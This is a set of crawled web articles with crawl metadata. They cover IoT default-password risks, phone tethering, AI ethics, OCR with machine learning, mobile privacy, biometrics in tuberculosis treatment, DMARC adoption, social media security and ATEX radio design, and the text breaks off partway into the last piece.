“It only took 30 minutes to find passwords for most of the devices and some of them were found through a Google search of the brand,” said PhD student Omer Shwartz, a member of Dr. Oren’s lab.
Consumers and businesses rarely change device passwords when purchased so devices could be operating with malicious code for years, added researchers, who were also able to log on to Wi-Fi networks simply by retrieving the password stored in a device.
Dr. Oren urged manufacturers to stop using easy, hard-coded passwords, to disable remote access capabilities, and to make it harder to get information from shared ports, like an audio jack (which was found to be vulnerable in other BGU studies).
“It seems getting IoT products to market at an attractive price is often more important than securing them properly,” he said.
A plan for smart home safety
Dr Oren’s team have proposed a seven-point plan for the safe use of smart home products.
1. Buy IoT devices only from reputable manufacturers and vendors.
2. Avoid purchasing used IoT devices. They could already have malware installed.
3. Research each device online to determine if it has a default password. If so, change it before installing.
4. Use strong passwords with a minimum of 16 letters. These are harder to crack.
5. Multiple devices shouldn’t share the same passwords.
6. Update software regularly – something only reputable manufacturers will provide.
7. Carefully consider the benefits and risks of connecting any device to the internet.
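Why at least 16 characters (point 4)? Each extra character multiplies the brute-force search space by the alphabet size. A quick back-of-the-envelope calculation, using a lowercase-only alphabet purely for illustration:

```python
import math

def brute_force_space(alphabet_size: int, length: int):
    """Number of candidate passwords, and the equivalent bits of
    entropy for a randomly chosen password of this length."""
    combos = alphabet_size ** length
    return combos, length * math.log2(alphabet_size)

for length in (8, 16):
    combos, bits = brute_force_space(26, length)
    print(f"{length} letters: {combos:.2e} candidates, about {bits:.0f} bits")
```

Doubling the length from 8 to 16 letters squares the search space rather than doubling it, which is the whole point of the recommendation; mixing in digits and symbols grows the alphabet and helps further.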
Internet of Business says
We have published a number of stories that share a similar theme recently. The lesson is twofold. First, as the popularity of IoT devices and smart home gadgets increases, so will the media noise surrounding them. And second, it seems as if manufacturers – many of them with zero track record in cybersecurity – are indeed rushing products to market with basic security flaws easily exposed. | <urn:uuid:eff6184d-0ddf-4b15-beac-48afdcc61a1a> | CC-MAIN-2022-40 | https://internetofbusiness.com/israeli-hackers-breach-baby-monitors-smart-homes-in-30-minutes/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334620.49/warc/CC-MAIN-20220925225000-20220926015000-00366.warc.gz | en | 0.952918 | 540 | 2.671875 | 3 |
Cell phone hotspots and tethering
The process of cell phone tethering is to use your cell phone as the source of your Internet connection. Cell phones use the exact same wireless technology as data sticks.
Over the past few years tethering has become the norm and is generally accepted and allowed by the wireless providers. Rogers, Bell, Telus, Wind and others generally do allow tethering on their networks; however, some cell phone plans may not allow it. Please check with your provider whether tethering is allowed, or you may be charged extra.
There are three ways to use your cell phone as your source for the Internet:
1 – Wi-Fi Hotspot – This is the most simple and most common method. An option to enable the hotspot function can usually be found in the settings, either in the mobile network options or in the Wi-Fi options.
2 – USB cable tethering – This method delivers the same functionality as the Wi-Fi hotspot, however it is a bit more complex as the method depends on having the drivers installed on the computer. There have been cases where software updates have broken the USB tethering option from iTunes, rendering this method unusable.
3 – Bluetooth connection – Pairing your phone and your computer with Bluetooth is simple. However, not all phones support passing the internet connection through Bluetooth. On another note, Bluetooth isn’t meant for high-speed data access, as it is a technology designed for devices which do not require very fast connections. In general, this method isn’t the most popular one.
Why tether at all?
Tethering gives people the ability to work on the go, wherever there is cell phone service. It is also a great replacement for data sticks, avoiding another bill, since data sticks require a separate subscription.
We at Group 4 Networks recommend the Wi-Fi hotspot option, as it is the easiest to set up and the most common.
Should you have a hard time configuring tethering on your phone or would like more information on the topic, feel free to contact Group 4 Networks – we will gladly help. | <urn:uuid:8f0fffac-df60-42e3-b2bf-3155f959afb1> | CC-MAIN-2022-40 | https://g4ns.com/cell-phone-hotspots-and-tethering/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335257.60/warc/CC-MAIN-20220928145118-20220928175118-00366.warc.gz | en | 0.922816 | 440 | 2.78125 | 3 |
The implementation of artificial intelligence (AI) across all areas of daily life, from mobile applications to job recruitment, has brought with it important ethical considerations. The impact of AI is so significant that lawmakers, businesses and even governments are scrutinizing it to establish boundaries and rules that can safeguard individuals' rights.
Professor Lokke Moerel, Senior of Counsel at Morrison & Foerster and one of Europe’s leading AI lawyers, exposed the current ethical dilemmas affecting AI implementation and the need to open black boxes to identify biases at the recent CIO UK Artificial Intelligence Summit.
She opened her talk by introducing two ethical dilemmas to her audience. In the first one, data scientists from a pharmaceutical company were presented with a situation where a product was short in supply. The firm’s executives asked them to make a prediction on how to best distribute the product to limit shortage and reduce complaints.
The data team reorganised the distribution with a positive outcome and a minimal number of complaints. In theory, the black box algorithm was successful and all stakeholders were satisfied.
However, explained Professor Moerel, looking at the reorganisation of the product distribution, it was discovered that it actually demoted certain postal codes – those from unprivileged neighbourhoods and with communities less prone to complain as a result of social alienation. What to do?
“‘The AI did it’ is not an acceptable excuse. Algorithmic accountability implies an obligation to report and justify algorithmic decision-making and to mitigate any negative social impacts or potential harms,” Professor Moerel said, referencing an MIT article about algorithmic accountability from 2017.
The second scenario the academic described concerned an AI-powered recruiting tool which favoured male candidates over female ones, though no more so than in the past. The underlying cause of this bias was that the algorithm had been trained on historical data consisting predominantly of resumes from male candidates.
“If your data is biased – ‘one-sided’ – the algorithm will be biased,” declared the lawyer and academic. “You can’t just use all your historical data because all your historical data is likely biased. It’s very hard to get clean data.”
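One common first check for this kind of one-sided historical data is to compare outcome rates per group before any training happens. The sketch below is illustrative only: the group labels, toy records and the 80% "four-fifths" threshold are assumptions for the example, not figures from the talk.

```python
# Sketch: flag potential selection bias in historical training data
# by comparing per-group positive-outcome rates (disparate impact).

def selection_rates(records):
    """records: list of (group, selected) pairs -> selection rate per group."""
    totals, selected = {}, {}
    for group, was_selected in records:
        totals[group] = totals.get(group, 0) + 1
        selected[group] = selected.get(group, 0) + int(was_selected)
    return {g: selected[g] / totals[g] for g in totals}

def disparate_impact(records, threshold=0.8):
    """Ratio of lowest to highest group selection rate.
    Falling below the commonly used 0.8 threshold suggests skewed data."""
    rates = selection_rates(records)
    ratio = min(rates.values()) / max(rates.values())
    return ratio, ratio < threshold

# Toy historical hiring data: predominantly male hires, as in the example above.
history = [("male", True)] * 60 + [("male", False)] * 40 \
        + [("female", True)] * 10 + [("female", False)] * 40
ratio, biased = disparate_impact(history)
# male rate 0.6 vs female rate 0.2 -> ratio ~0.33, well below 0.8
```

A check like this does not fix the bias, but it makes the one-sidedness visible before the model bakes it in.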
Digital Revolution, the new Industrial Revolution
In Professor Moerel’s view, there are great similarities between the first Industrial Revolution and today’s digital one. Although the former brought with it technological progress, it also created child labour, pollution and poor working conditions.
New technologies required numerous trials before they could work as required and be fully regulated.
“The first car had a person walking in front of it with a red flag because it didn’t have brakes,” she said. “Think about what society did then: roads, airbags, rules to regulate vehicles safety. Artificial intelligence is that first car without brakes. How it looks today is not how it will look in half a year from now and after we start cracking the black box.”
Although it might be tempting to adopt a pessimistic approach to AI, the scholar stressed that the new technology is just making its first steps, but that issues will be ultimately addressed. As was the case in the Industrial Revolution, some of the problems might however take years to be dealt with adequately.
Above all, Professor Moerel stressed the need for accountability. Despite decisions being processed by machines, there must be human accountability for the AI-driven tools used by organisations.
“If you end up in court and your answer is ‘the algorithm did it’, it won’t be accepted,” she said. “It’s one of your tools and you have to deal with it, making sure it comes to the right solutions: you must justify your algorithm-making and mitigate the negative effects. That is your task.”
According to Professor Moerel, at the core of the AI ethics dilemma lies privacy. From a legal perspective, there is no ownership of data – data is an intangible asset. There are also no intellectual property rights in data.
“The bizarre thing is that all the other fundamental rights – discrimination, freedom of speech, and so on – are folded into the assessment whether you can process the data under data protection laws,” she said. “That’s why it’s all about privacy.”
AI feeds on vast amounts of data, which it then analyses to make predictions. The professor cited an example where people who suffer from obesity share a particular set of characteristics, which result in predictions. These predictions lead to actions, such as insurance companies increasing the insurance premium.
This implies a major legal shift in the burden of proof. If someone has those characteristics, they will be predicted as future obesity cases. How can people then prove that they won’t be obese?
“The question is, do I get a chance to prove the algorithm was wrong?” Professor Moerel asked the audience. “There are a number of challenges, including unforeseen applications and discrimination.”
Professor Moerel disagrees with calls for new extensive legislation, as the GDPR already provides adequate rules for data processing in the context of AI.
“GDPR requires you to mitigate impact on individuals plus society as a whole. This requires also an ethical assessment. There are many examples where companies were legally compliant, they got the consent, and still made everyone upset.”
She added: “Law is what you may or may not do – what you are allowed to do – and ethics is what you should or should not do. It’s a different assessment. Other than what people think, ethics are quite stable over time.”
If organisations and governments are transparent about the data and AI tools they are using, then there's hope for better use of AI. The key point is that black boxes shouldn't result in unfair biases, but should instead benefit individuals or society as a whole. In addition, algorithms need to be auditable and people must be accountable for them.
“We will overcome all the downsides of AI like we did with the Industrial Revolution but you have to be open about the negatives or the concerns so you can address them,” Professor Moerel concluded. “If you don’t, you’ll get a big backlash.”
Cristina Lago is Online Editor of CIO Asean
[Register for upcoming CIO UK events here] | <urn:uuid:835b2c6b-ec42-47cf-82af-79c7f7f216b0> | CC-MAIN-2022-40 | https://www.cio.com/article/196037/europe-s-leading-artificial-intelligence-lawyer-discusses-the-ethical-implications-of-ai.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337338.11/warc/CC-MAIN-20221002150039-20221002180039-00366.warc.gz | en | 0.95256 | 1,374 | 2.546875 | 3 |
Machine Learning technologies are replacing simple OCR automation and manual data entry. This ground-breaking technology offers solutions to human errors, scalability challenges, human resource issues, and turnover issues, using an approach considerably superior to OCR's simple rules framework.
Machine Learning paired OCR
Artificial Intelligence, or AI, is a great tool for addressing the barriers of classic OCR approaches and achieving faster and more precise results.
Using Machine Learning to preprocess documents before passing them to a template is one way of circumventing OCR difficulties.
Additionally, Machine Learning-augmented OCR still uses OCR to interpret characters, while improving the results by adding context and flexibility.
Moreover, Machine Learning continually improves its ability to understand the context of data and how it should be handled. It can also be used in preprocessing to identify the significant portions for extraction and to classify documents before they are extracted, making it easier to anticipate what to expect from the extraction process. AI models may also be developed over time to evaluate historical data and detect potentially fraudulent activities, errors, and exceptions.
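As an illustration of that classification step, document routing can be sketched with a simple bag-of-words scorer standing in for a trained classifier. The document classes and keyword lists below are invented for the example; a production system would learn these from labeled data rather than hard-code them.

```python
# Sketch: route OCR'd text to a document class before field extraction.
# A real pipeline would use a trained classifier; keyword scoring stands in here.

KEYWORDS = {
    "invoice": {"invoice", "total", "due", "amount"},
    "resume": {"experience", "education", "skills"},
    "receipt": {"receipt", "cash", "change", "subtotal"},
}

def classify(text):
    """Return the class whose keyword set overlaps the text the most."""
    tokens = set(text.lower().split())
    scores = {label: len(tokens & words) for label, words in KEYWORDS.items()}
    return max(scores, key=scores.get)

doc = "INVOICE #42 - total amount due: $310.00"
label = classify(doc)  # -> "invoice"
```

Knowing the class up front tells the extractor which fields to expect, which is exactly the anticipation benefit described above.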
How Does it Work?
OCR Data Capture recognizes text from an analog image source and converts it to a digital duplicate which can be managed, stored, and edited easily.
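Conceptually, that conversion runs through a short pipeline: preprocess the image, segment it into glyphs, recognize each glyph, and assemble the text. The sketch below uses deliberately tiny stand-in steps so the flow itself is visible; real OCR engines implement each stage with far more sophistication.

```python
# Sketch of the classic OCR pipeline: preprocess -> segment -> recognize -> assemble.

def preprocess(pixels):
    """Binarize: any pixel above the threshold counts as ink."""
    return [[1 if p > 128 else 0 for p in row] for row in pixels]

def segment(binary):
    """Split the page into 'glyphs' (here: one glyph per column of pixels)."""
    return [tuple(row[i] for row in binary) for i in range(len(binary[0]))]

def recognize(glyph, templates):
    """Match a glyph against known templates -- the character-classification step."""
    return templates.get(glyph, "?")

def ocr(pixels, templates):
    binary = preprocess(pixels)
    return "".join(recognize(g, templates) for g in segment(binary))

# Two-column toy 'image': column (1, 0) means 'I', column (1, 1) means 'L'.
templates = {(1, 0): "I", (1, 1): "L"}
page = [[200, 255], [0, 200]]   # 2x2 grayscale pixels
text = ocr(page, templates)     # -> "IL"
```

The template-matching step is exactly where classic OCR is brittle, and where the ML-based recognizers discussed below take over.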
Despite the great usability of OCR, the increasing scale of the jobs incorporated into these models presents Machine Learning engineers with a substantial hurdle.
For one, it is a difficult undertaking since it sits at the intersection of two Artificial Intelligence fields: Natural Language Processing (NLP), which deals with text and speech-to-text transcription data and is concentrated on teaching machines to understand human speech, and Computer Vision (CV), which trains ML models to see and interpret visual elements in a manner relevant to how people see and solve them.
Therefore, before the OCR models can achieve their aim, they must first complete a series of smaller-scale tasks, beginning with image recognition of the letters and ending with the comprehension of the final words.
When the texts that need to be identified appear in natural settings, the OCR problem becomes more complicated. These natural settings include handwritten shopping lists, license plates on cars, random graffiti on buildings, street signs, and many more.
Moreover, when the algorithm is asked to convert the text into a digital copy and comprehend the specific data it contains, an extra layer of complexity is introduced. While various methods have been used to tackle OCR, from contour detection to image classification, these methods still work best for template-based text patterns with similar text size and type, image quality, and text position. Such strategies, in other words, are ineffective for large-scale, heterogeneous texts.
Noteworthy Advantages of OCR paired with Machine Learning
Below is a list of the edges offered by an OCR paired with Machine Learning:
The more ML gets used, the fewer mistakes happen and the more complicated decisions it can make.
Businesses all across the world are concerned about data inaccuracy and duplication, as this problem is unavoidable. As a result, most companies are looking to automate their data entry operations to decrease manual errors and obtain highly accurate data for future analysis. Machine learning and predictive modeling algorithms are critical in reducing data entry errors and resolving issues with erroneous data.
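One small, concrete piece of that duplication problem can be illustrated with fuzzy string matching from Python's standard library. The record values below are invented for the example; real systems typically combine similarity scores like this with learned models.

```python
# Sketch: flag likely duplicate data-entry records using fuzzy string similarity.
from difflib import SequenceMatcher

def similarity(a, b):
    """0.0..1.0 similarity ratio between two record strings."""
    return SequenceMatcher(None, a.lower(), b.lower()).ratio()

def find_duplicates(records, threshold=0.9):
    """Return index pairs whose records are suspiciously similar."""
    pairs = []
    for i in range(len(records)):
        for j in range(i + 1, len(records)):
            if similarity(records[i], records[j]) >= threshold:
                pairs.append((i, j))
    return pairs

records = [
    "ACME Corp, 12 Main Street, Springfield",
    "Acme Corp, 12 Main Street, Springfeild",  # typo'd re-entry of record 0
    "Globex Inc, 99 Ocean Avenue, Shelbyville",
]
dupes = find_duplicates(records)  # -> [(0, 1)]
```

Flagged pairs can then be routed to a human or a model for a merge decision instead of silently polluting the dataset.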
Once trained on a function, Machine Learning does not rely on manual processes.
On a large scale, Machine Learning algorithms have already powered the present technological and economic revolution. Automated data entry can be utilized in various applications and is quite advantageous, thanks to predictive analysis and algorithms. Human data entry may not be sustainable in the future, and organizations will need to use machine learning to automate data entry. With each passing day, the world becomes more and more automated, and you must remove common data entry errors.
Machine Learning can handle both structured and unstructured data with ease.
Machine learning algorithms have been helpful in data automation and the handling of large amounts of big data. The real benefit of employing algorithms is that they can handle massive amounts of data while evaluating an infinite number of variables in a short amount of time.
Machine learning can convert handwriting into data.
An additional layer of complexity is introduced when the algorithm is asked to transform handwritten text into a digital copy and interpret the specific data it contains.
Invest in-house or Outsource as SaaS?
With the information provided above, the question remains. Is it better to invest in this technology in-house or to outsource this function as a SaaS?
Building an In-house Data Labeling Team
Having a data labeling team on staff can help a project in a variety of ways. For many firms, the main argument for an in-house data labeling team is direct oversight of the entire data annotation process, which makes putting a team together on-site a good idea.
The second argument for forming one's own data annotation team is security. If files are handed to a third party for annotation, security rules could potentially be breached. When jobs involve extremely sensitive themes and images that cannot be shared over the internet, on-site teams are the best option.
Lastly, it is customary to have an in-house team for long-term Artificial Intelligence projects. Data flow is continuous, and personnel must annotate it over long periods.
The disadvantages of forming one's own data labeling team are evident: the enormous time and resources required to hire and train a professional team, provide a secure location to operate, design software with the appropriate tools, and compile instructions. Constant administration of new staff is also time-consuming and necessitates the assistance of HR professionals, and if demand is seasonal or project-by-project, one will need to manage a steady turnover of personnel.
The Difference Between SaaP and SaaS
The following section will discuss the difference between SaaP and SaaS.
OCR paired ML as Software as a Product
Software as a Product, or SaaP, solutions necessitate the purchase of a license to use a solution, which one must then host oneself. SaaP solutions are a one-time investment with no monthly fees, but they frequently require considerable maintenance and updates. Additional expenses may get incurred if the product gets upgraded in the future or if an add-on gets installed.
If one wants to install the software on another computer, one may incur additional expenses, and engineers familiar with the software also need to be hired. Lastly, because one owns the software and executes it on the workstation, SaaP software is usually more customizable than SaaS software.
The Benefits of SaaP
Software as a product is something one buys rather than something one rents. Once it has been implemented, it is the responsibility of the business to ensure software maintenance. Upgrades to SaaP are frequently expensive, and the business will be extensively involved from the start.
Because SaaP isn't cloud-based, it necessitates the use of internal servers. And because SaaP is a static product, one will need to maintain it after acquiring the software: a committed crew is needed to keep up with software changes and data security. On the other hand, SaaP ensures there is no third-party oversight, security can be controlled directly, and the software remains usable offline.
OCR paired ML as Software as a Service
This software is distributed via internet browsers and is hosted by the software seller or a third party. With SaaS, the application and any data created by the user are stored in the cloud on the provider's servers and delivered back and forth over the internet.
Organizations get charged a standard cost for this service. In turn, the provider grants the user access to the application while adhering to quality standards, availability, and agreed-upon security. To utilize the software, all that is required is to have an Internet connection.
The Benefits of SaaS
SaaS offers the following benefits:
- Cost: Subscription-based software licensing makes it easier for organizations to identify and allocate expenditures to different business units or departments, and a consistent spend is easier to explain than a significant one-time expense every few years. Publishers who use the software-as-a-service model may also offer several pricing tiers, allowing enterprises to pay less in exchange for access to fewer program capabilities. This pricing model has lowered the purchasing threshold, allowing smaller enterprises to access software that they might not have been able to afford otherwise.
- Maintenance: Automatic access to patches and updates is perhaps the best feature of SaaS. With a perpetual software license, businesses can use one iteration of an application until it must be upgraded to the current version, either for security concerns or to access new features. A subscription-based model, by contrast, means that licenses are automatically updated as the publisher issues new versions. The staff will not be utilizing out-of-date software, and the company does not have to invest in a completely new program.
- Mobility: Employees today are searching for more flexibility in their jobs, and workplace mobility is a key part of that. As a result, companies are adopting rules that allow employees to work from home. This trend implies that the software employees rely on must be accessible from anywhere, so SaaS is becoming more popular. SaaS-based programs can be used anywhere there is a network connection because they do not require the installation of a disc, making the mobile workplace more accessible. With SaaP, by contrast, the system on which the program is installed must be on and online at all times for proper monitoring; because SaaS is web-based, it is much easier to track its performance and availability.
Companies outsource to vendors offering Machine Learning paired with OCR as a SaaS, gaining more flexibility and reduced expenses. As stated above, OCR paired ML as a SaaS only requires an internet connection to operate. Moreover, pricing varies depending on the features an employee needs to utilize, resulting in a reduced cost.
Conclusion

As the world changes swiftly, technology should evolve along with it. As information becomes crucial and more available, having room for error is not an option. Machine Learning is one great solution: it addresses human errors, scalability challenges, human resource issues, and turnover issues, whether used as a product or as a service.
Reach out to our team today! | <urn:uuid:922b5323-935f-4564-94ce-91878c335c1e> | CC-MAIN-2022-40 | https://itechdata.ai/machine-learning-paired-ocr-in-house-or-saas/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337446.8/warc/CC-MAIN-20221003231906-20221004021906-00366.warc.gz | en | 0.928549 | 2,336 | 3.15625 | 3 |
As technology advances, consumers' dependency on their smartphones grows stronger. Smartphones have become more valuable to consumers because they serve many purposes beyond a standard line of communication. In fact, the dependency has become so severe that there is now a phobia defined by the fear of not having your phone: nomophobia.
Consumers not only store personal items on their phones, like pictures and emails, but now use their phones to conduct business and banking transactions. This has turned these gadgets into walking gold mines for two different reasons. First, smartphones have a monetary value that physical thieves find desirable for pawning or selling. The more dangerous of the two is the potential identity theft through your phone being in the wrong hands. Many apps and mobile sites are designed to make logging in easy by storing personal information, which may make things more convenient, but certainly not safer. Not to mention, many consumers store passwords and personal records in their phones for a quick point of reference.
In efforts to solve this problem, many app development companies have created programs that use GPS as a way to track and locate your phone if it gets misplaced and/or stolen. While this technology is very useful and can save users from the pain of replacing their phones, it can also work against them in a very ironic way. The same technology that helps users find their misplaced phones also makes it easier for mobile hackers to access personal information. This is where the line between mobile security and mobile privacy often gets confused. While GPS-centric apps help with mobile security, they also exploit privacy. As the mobile security landscape shifts and adjusts to new standards, especially in regards to mobile payments and banking, it will become easier for companies to keep up. Perhaps that is the problem: right now mobile security is a step behind hackers. Fraud prevention measures are taken after malicious activity happens, when it should be the other way around. By knowing the risks and prevention measures earlier, companies can help put security in front of hackers.
[Contributed by EVS Marketing] | <urn:uuid:2a0d3b05-f738-4fe2-a97b-5801266342b0> | CC-MAIN-2022-40 | https://www.electronicverificationsystems.com/blog/Mobile-Security---The-Line-Between-Security-and-Privacy | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337853.66/warc/CC-MAIN-20221006155805-20221006185805-00366.warc.gz | en | 0.953066 | 453 | 2.515625 | 3 |
Using Fingerprints to fight TB
Operation Asha, a Nonprofit NGO, is fighting the spread of tuberculosis in India using a biometric terminal you can build at home.
In conjunction with Microsoft Research, Operation ASHA has assembled a portable, cost-effective and efficient biometric system called eCompliance, using a portable computer or tablet, an SMS modem, fingerprint reader and open source software.
The purpose of these terminals is to administer treatment to those affected by Tuberculosis living in slums in India, and to ensure that medication is taken regularly. This practice, called Directly Observed Therapy (DOT), is among the most effective ways to fight tuberculosis in the third-world, and accounts for nearly half of the World Health Organization’s funding initiative for its global plan to stop tuberculosis.
A large issue when treating tuberculosis is that irregular treatment leads to mutated strains and drug resistance, which has become increasingly difficult to detect and to treat. According to a recent CTV.ca report, previous systems for administering DOT to those affected by tuberculosis have produced some misleading statistics in terms of treatment regularity and completion. Operation Asha’s biometric system of tracking dosages and treatment has changed this trend.
“Health data can be fudged,” Shelly Batra, president of Operation ASHA said in the CTV.ca report. “A fingerprint can’t be fudged.”
According to Batra, fingerprinting has lowered the dosage default rate to 1.5 per cent, and she now wants to replace the computers with smartphones.
By making the transition to mobile, the cost of the device drops by over 40%.
The software used was developed in partnership with Microsoft Research and is available freely online on their website. | <urn:uuid:8eabd323-1c1a-402c-9979-a6a6ea8fe6ee> | CC-MAIN-2022-40 | https://www.biometricupdate.com/201211/using-fingerprints-to-fight-tb | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030333455.97/warc/CC-MAIN-20220924182740-20220924212740-00566.warc.gz | en | 0.936439 | 366 | 2.875 | 3 |
What if there existed a technology that could dramatically lower the chances of your domains being spoofed and used for phishing attacks on recipients. Would you take advantage of it? Probably not, because the technology does exist and almost nobody is using it. And the reasons why are confounding.
The technology is called DMARC, which stands for Domain-based Message Authentication, Reporting & Conformance. “It is designed to give email domain owners the ability to protect their domain from unauthorized use, commonly known as email spoofing. The purpose and primary outcome of implementing DMARC is to protect a domain from being used in business email compromise attacks, phishing emails, email scams and other cyber threat activities.”
Why does DMARC matter? “DMARC is the first and only widely deployed technology that can make the ‘header from’ address (what users see in their email clients) trustworthy. Not only does this help protect customers and the brand, it discourages cybercriminals who are less likely to go after a brand with a DMARC record.”
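A domain publishes its DMARC policy as a DNS TXT record at _dmarc.<domain>. The record string below follows the standard tag syntax, but the domain, report mailbox, and the tiny parser are illustrative assumptions rather than anything from the article.

```python
# Sketch: parse a DMARC TXT record (as published at _dmarc.example.com)
# into its tag/value pairs and check what policy it requests.

SAMPLE_RECORD = "v=DMARC1; p=reject; rua=mailto:dmarc-reports@example.com; pct=100"

def parse_dmarc(record):
    """Split 'tag=value; tag=value' pairs into a dict."""
    tags = {}
    for part in record.split(";"):
        part = part.strip()
        if "=" in part:
            tag, _, value = part.partition("=")
            tags[tag.strip()] = value.strip()
    return tags

def is_enforcing(record):
    """True when the domain asks receivers to quarantine or reject spoofed mail."""
    tags = parse_dmarc(record)
    return tags.get("v") == "DMARC1" and tags.get("p") in ("quarantine", "reject")

policy = parse_dmarc(SAMPLE_RECORD)     # {'v': 'DMARC1', 'p': 'reject', ...}
enforcing = is_enforcing(SAMPLE_RECORD)  # -> True
```

The p= tag is the crucial one: a record with p=none merely requests reports, while p=quarantine or p=reject actually tells receivers to act against spoofed mail.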
According to an article on TechRepublic, “nearly 80% of websites have no DMARC policy in place, increasing the odds that their domain will be spoofed and used for phishing attacks on customers, according to 250ok’s Global DMARC Adoption 2019 report.”
“DMARC is considered the industry standard for email authentication to prevent attacks in which hackers send malicious emails via counterfeit web addresses, the report said.”
How widespread is the problem? “Only 23% of companies in the Fortune 500 have some form of DMARC policy despite being the largest US companies by revenue.“
To make matters worse, most 2020 Presidential campaigns are not using it. “[M]ost of the political campaigns of current major party candidates for next year’s U.S. presidential elections are failing to implement proper Domain-based Message Authentication, Reporting and Conformance (DMARC) policies to protect their donors and voters from phishing attacks that could lead to fraud.”
There are really only two possible explanations for the low adoption rate of DMARC. Either organizations don’t understand DMARC or they don’t care.
“Given the information available on the risks associated with leaving your domain unprotected, it’s shocking the number of brands that still don’t understand the importance of DMARC,” said Matthew Vernhout, director of privacy at 250ok.
The other possibility is that they don't care. The reason is that DMARC isn't really used to protect you; it's used to protect others. And maybe that's it: implementing DMARC means being a good neighbour, and perhaps that isn't sufficient motivation, but it should be.
Social Media and Cybersecurity: What’s the Relationship Status?
It's clear: social media and cybersecurity have quite a relationship. We often expose essential parts of our lives on the web, down to the tiniest details. As a result, we should know how social media and cybersecurity mingle. Previously, we've discussed the impact social media has had on cybersecurity and the power of misinformation. But now that some time has passed, you may be wondering: what's the update? What does the relationship look like now? Well, hold on to your seats. After massive shifts like data privacy updates and other emerging trends, this will be a whirlwind.
According to Statusbrew, “over the past 12 months, the number of active social media users increased by more than 400 million, an addition of 9.9% for the total number to reach 4.55 billion.” Shocking? Not exactly, but a great reminder that social media is one of the most popular forms of communication around the world today. Although most social media platforms have security settings, cybercriminals find ways to access sensitive information. This sensitive information can include your passwords, bank account details, email addresses, or anything that they can use to steal your identity. For that very reason, social media and cybersecurity need each other now, more than ever. Let’s explore:
Significant Changes Call for Cybersecurity
Social media platforms are constantly changing their policies and algorithms, and with new updates come new security risks. Social media platforms must rely on cybersecurity protocols and best practices to mitigate risk. Let’s look at Facebook’s plans to transform into Meta as a popular example:
In 2021, Facebook announced that it would change its name and rebrand itself as Meta. Meta will be based around virtual reality (VR) and augmented reality. Although the social media platform's structure will stay the same, the new rebrand raises possible concerns about privacy and security, including the possibility of data such as usernames, email addresses, and other sensitive information being mishandled or breached by bad actors attempting to break into this new space. This is exactly where cybersecurity comes into play.
What Role Do You Play?
Like all relationships, social media and cybersecurity face challenges. However, throughout it all, they rely on one another to keep individuals safe. As the popularity of social networking sites among businesses worldwide increases, cybercrime will take a bigger bite out of companies unprepared for battle. Whether you are an organization using social media to help generate brand awareness or an individual using social media to keep up with friends, you must be aware of your responsibilities concerning security. A few of those responsibilities include:
- Enable two-step authentication to protect all accounts.
- Keep your passwords updated regularly; refrain from repeating the same password across multiple accounts.
- Manage your privacy settings.
- Use precaution on all platforms; if something looks suspicious, report it.
Keeping the relationship between social media and cybersecurity healthy is not an easy job, nor one that can be done quickly. It will require help from us all, using these social platforms as they are intended.
Two Peas, One Pod
As long as the Internet of Things is around, bad actors will continue to pose a massive threat to businesses and personal lives. Social media is built to connect us to one another through shared personal information and experiences, which makes it a primary target for hackers.
To sum up the ongoing status of this relationship, social networking sites will always need cybersecurity to protect shared experiences and information. Cybersecurity will always need social media as a channel to communicate the importance of navigating the cyberworld safely.
If you’re interested in learning more about this evolving relationship, check out a recent blog post: Cybersecurity’s Latest Battle: The Rise of Misinformation on Social Media. | <urn:uuid:f6553149-c151-42e9-b38a-4cab792ce353> | CC-MAIN-2022-40 | https://adlumin.com/post/social-media-cybersecurity/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335004.95/warc/CC-MAIN-20220927100008-20220927130008-00566.warc.gz | en | 0.926634 | 860 | 2.59375 | 3 |
COMMUNICATIONS IN HAZARDOUS ENVIRONMENTS. ATEX radios are essential tools for those working in the oil and gas industry where the working environment may contain potentially explosive gas or dust.
The starting point for all ATEX equipment is the focus on preventing the creation of an ignition source within a potentially explosive environment. Beyond this key point, when designing any two-way communications equipment there are five key considerations: audio performance, coverage, ruggedness, accessories and usability.
The predominant user groups for ATEX radios - from workers in the oil and gas industry, and fire fighters, to airport ground crews and miners - all share challenging operating conditions. They all experience very loud environments, often in excess of 90dB. This drives the most obvious requirement that the two-way radio communications equipment must be able to deliver clear, loud audio which can overcome the background noise.
And here we encounter perhaps one of the toughest technical challenges of communications in an ATEX product. In a non-ATEX product the simple solution is to drive more power into a bigger speaker. Unfortunately to meet the ATEX standards we need to restrict the amount of current which can be used to drive the speakers in the radios and accessories. This in turn directly impacts the loudness and clarity which can be generated. The challenge is to drive the speakers to the loudest, clearest possible level to overcome the 85-90dB ambient noise levels without resulting in the radio becoming an ignition source.
We also find that in certain environments the ambient noise is of a ‘different’ type. The sound of a pump bay on the fire truck is very different to the sound of an airplane engine or a petroleum refinery. The actual noise levels, the loudness, can be very similar, yet the frequencies which are generated can result in very different audio interferences. This requires the radios and accessories to be optimised for each particular type of ambient background noise.
NETWORK AND RADIO COVERAGE
Often the networks in which an ATEX radio is used will be privately owned by the plant or facility itself. Civil fire fighters, by contrast, will often operate on a regional or nationwide public safety network. In both situations, communications managers will want to optimise their network to minimise capital investment whilst maximising coverage. This means the transmission power and receiver sensitivity of the radio need to be maximised to give the best possible coverage.
Receiving a signal in the radio does not necessarily cause any major challenges from an ATEX perspective, however when transmitting voice or data from the radio, some of the internal components can generate heat. This in turn can raise the temperature on the outer skin of the radio - and the hotter the surfaces of the radio, the higher the risk of ignition of a gas or dust.
With more efficient RF design, higher transmission power can be achieved without raising the temperature of the radio. The challenge for TETRA has been creating a radio that can transmit at the same power levels as non-ATEX radios. The ETSI standard defines transmit power in “Class” levels – for example a Class 4 radio has a nominal Tx power of 1W, but the actual definition is 30 dBm +/- 2dB, allowing some design flexibility and manufacturing tolerance. For most modern non-ATEX radios the Tx power is aligned to the higher end of this tolerance – i.e. above 1W, however for ATEX radios the actual measured Tx power of a Class 4 radio is less than 1W – often around 0.7W. This is driven by the need to limit maximum currents in the radio and to limit heating effects.
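As a rough illustration (generic physics, not specific to any particular radio), the dBm-to-watts relationship behind these class definitions can be computed directly:

```python
import math

def dbm_to_watts(dbm: float) -> float:
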